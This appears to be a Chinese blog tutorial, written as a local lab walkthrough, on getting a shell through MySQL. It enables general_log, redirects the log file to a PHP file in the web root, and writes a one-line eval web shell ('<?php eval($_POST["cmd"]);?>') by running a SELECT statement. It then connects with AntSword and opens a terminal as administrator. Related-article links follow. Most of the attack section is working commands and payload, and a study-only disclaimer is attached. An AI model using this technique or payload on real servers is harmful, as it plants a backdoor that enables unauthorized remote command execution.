数据库提权

1.此时实验需要用到的软件:

(1)phpStudy该程序包集成最新的Apache+PHP+MySQL+ phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等.总之学习PHP只需一个包。

(2)中国蚁剑,中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

2.首先要开启我们的phpStudy的服务
3.登录我们的phpmyadmin

这里简单的介绍一下phpmyadmin,它是一个以 PHP 为基础,以 Web-Base 方式架构在网站主机上的 MySQL 的数据库管理工具,让管理者可用 Web 接口管理 MySQL 数据库

4.利用MySQL日志导马

先开启全局日志:使用这条语句SET GLOBAL general_log = 'on'

5.查看通用查询日志

使用这条语句:SHOW VARIABLES LIKE '%general%'

当开启 general_log 时,所执行的 SQL 语句都会出现在 stu1.log 文件中。那么如果修改 general_log_file 的值为一个php文件,则所执行的 SQL 语句就会对应生成在对应的文件中,进而可 Getshell

6.将指定日志写入网站的根目录

.利用这条语句:SET GLOBAL general_log_file = 'C:/phpStudy/www/hack.php'将指定日志写入到网站根目录的 hack.php 文件

7.执行SQL语句

SELECT '<?php eval($_POST["cmd"]);?>',即可将一句话木马写入 hack.php 文件中 访问/hack.php 成功写入

8.查看hack.php

发现这个木马文件的路径在这个位置上 然后用中国蚁剑连接:

9.连接

首先先测试连接

发现测试成功后我们进行添加操作

10.打开虚拟终端

可以发现我们登录进来后的用户是administrator,同时也可以进行一些操作

注意该实验仅供网络安全方向的进行学习,严禁用于从事违法的行为!!!

相关推荐
LightOfNight1 小时前
Redis设计与实现第14章 -- 服务器 总结(命令执行器 serverCron函数 初始化)
服务器·数据库·redis·分布式·后端·缓存·中间件
代码中の快捷键1 小时前
MySQL数据库存储引擎的数据结构
数据结构·数据库·mysql
Adolf_19931 小时前
Django 路由层
数据库
好记忆不如烂笔头abc1 小时前
logminer挖掘日志归档查找问题
数据库·sql·mysql
java_heartLake9 小时前
PostgreSQL数据库参数调优实践
数据库·postgresql·调优
xnuscd10 小时前
Milvus概念
数据库·学习·mysql
代码欢乐豆11 小时前
软件工程第13章小测
服务器·前端·数据库·软件工程
小gpt&12 小时前
实现qt拖拽显示或者播放
数据库·qt·音视频
望获linux12 小时前
在 ARM 平台上如何实现Linux系统的1秒启动
linux·服务器·开发语言·数据库·操作系统·嵌入式操作系统·arm平台
漫天转悠12 小时前
MySQL 七种JOIN连接详解
数据库·mysql